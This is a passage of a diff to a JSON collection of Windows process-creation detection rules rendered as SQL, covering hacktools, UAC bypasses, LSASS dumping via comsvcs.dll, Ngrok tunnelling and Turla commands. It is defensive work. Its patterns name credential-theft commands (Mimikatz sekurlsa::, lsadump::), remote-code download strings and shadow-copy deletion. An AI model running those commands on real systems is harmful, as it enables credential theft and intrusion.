- "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "status": "test", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1047" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE 